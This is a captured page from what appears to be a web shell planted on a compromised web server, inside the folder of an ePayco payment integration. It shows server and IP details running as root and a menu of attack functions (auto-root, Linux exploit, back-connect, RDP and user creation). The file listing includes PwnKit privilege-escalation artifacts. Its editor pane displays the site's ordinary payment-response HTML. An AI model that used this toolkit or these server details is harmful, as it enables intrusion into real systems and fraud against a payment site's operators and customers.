Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
ePayco /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
archivo.txt
764
B
-rwxrwxrwx
confirmation.php
13.06
KB
-rwxrwxrwx
dbconfig.php
1.74
KB
-rwxrwxrwx
error_log
2.65
KB
-rwxrwxrwx
logo.png
4.62
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
response.html
5.56
KB
-rwxrwxrwx
wp-blog-header.php
2.74
KB
-r--r--r--
wp-cron.php
2.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : response.html
<!DOCTYPE html> <html lang="es"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags --> <title>Formulario Pruebas Respuesta</title> <!-- Bootstrap --> <link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet"> <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet"> <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> </head> <body> <?php $fh = fopen("prueba.txt", 'w') or die("Se produjo un error al crear el archivo"); $texto = <<<_END Comienza con Linea 1 Linea 2 Termina con Linea 3 _END; fwrite($fh, $texto) or die("No se pudo escribir en el archivo"); fclose($fh); echo "Se ha escrito sin problemas"; ?> <header id="main-header" style="margin-top:20px"> <div class="row"> <div class="col-lg-12 franja"> <img class="center-block" src="logo.png" style=""> </div> </div> </header> <div class="container"> <div class="row" style="margin-top:20px"> <div class="col-lg-8 col-lg-offset-2 "> <h4 style="text-align:left"> Respuesta de la Transacción </h4> <hr> </div> <div class="col-lg-8 col-lg-offset-2 "> <div class="table-responsive"> <table class="table table-bordered"> <tbody> <tr> <td>Referencia</td> <td id="referencia"></td> </tr> <tr> <td class="bold">Fecha</td> <td id="fecha" class=""></td> </tr> <tr> <td>Respuesta</td> <td id="respuesta"></td> </tr> <tr> <td>Motivo</td> <td id="motivo"></td> </tr> <tr> <td class="bold">Banco</td> <td class="" id="banco"> </tr> <tr> <td class="bold">Recibo</td> <td id="recibo"></td> </tr> <tr> <td class="bold">Total</td> <td class="" id="total"> </td> </tr> </tbody> </table> </div> </div> </div> </div> <footer> <div class="row"> <div class="container"> <div class="col-lg-8 col-lg-offset-2"> <img src="https://369969691f476073508a-60bf0867add971908d4f26a64519c2aa.ssl.cf5.rackcdn.com/btns/epayco/pagos_procesados_por_epayco_260px.png" style="margin-top:10px; float:left"> <img src="https://369969691f476073508a-60bf0867add971908d4f26a64519c2aa.ssl.cf5.rackcdn.com/btns/epayco/credibancologo.png" height="40px" style="margin-top:10px; float:right"> </div> </div> </div> </footer> <!-- jQuery (necessary for Bootstrap's JavaScript plugins) --> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.1/jquery.js"></script> <!-- Include all compiled plugins (below), or include individual files as needed --> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script> <script> function getQueryParam(param) { location.search.substr(1) .split("&") .some(function(item) { // returns first occurence and stops return item.split("=")[0] == param && (param = item.split("=")[1]) }) return param } $(document).ready(function() { //llave publica del comercio //Referencia de payco que viene por url var ref_payco = getQueryParam('ref_payco'); //Url Rest Metodo get, se pasa la llave y la ref_payco como paremetro var urlapp = "https://secure.epayco.co/validation/v1/reference/" + ref_payco; $.get(urlapp, function(response) { if (response.success) { if (response.data.x_cod_response == 1) { //Codigo personalizado alert("Transaccion Aprobada"); console.log('transacción aceptada'); } //Transaccion Rechazada if (response.data.x_cod_response == 2) { console.log('transacción rechazada'); } //Transaccion Pendiente if (response.data.x_cod_response == 3) { console.log('transacción pendiente'); } //Transaccion Fallida if (response.data.x_cod_response == 4) { console.log('transacción fallida'); } $('#fecha').html(response.data.x_transaction_date); $('#respuesta').html(response.data.x_response); $('#referencia').text(response.data.x_id_invoice); $('#motivo').text(response.data.x_response_reason_text); $('#recibo').text(response.data.x_transaction_id); $('#banco').text(response.data.x_bank_name); $('#autorizacion').text(response.data.x_approval_code); $('#Cedula').text(response.data.x_customer_document); $('#total').text(response.data.x_amount + ' ' + response.data.x_currency_code); } else { alert("Error consultando la información"); } }); }); </script> </body> </html>
Close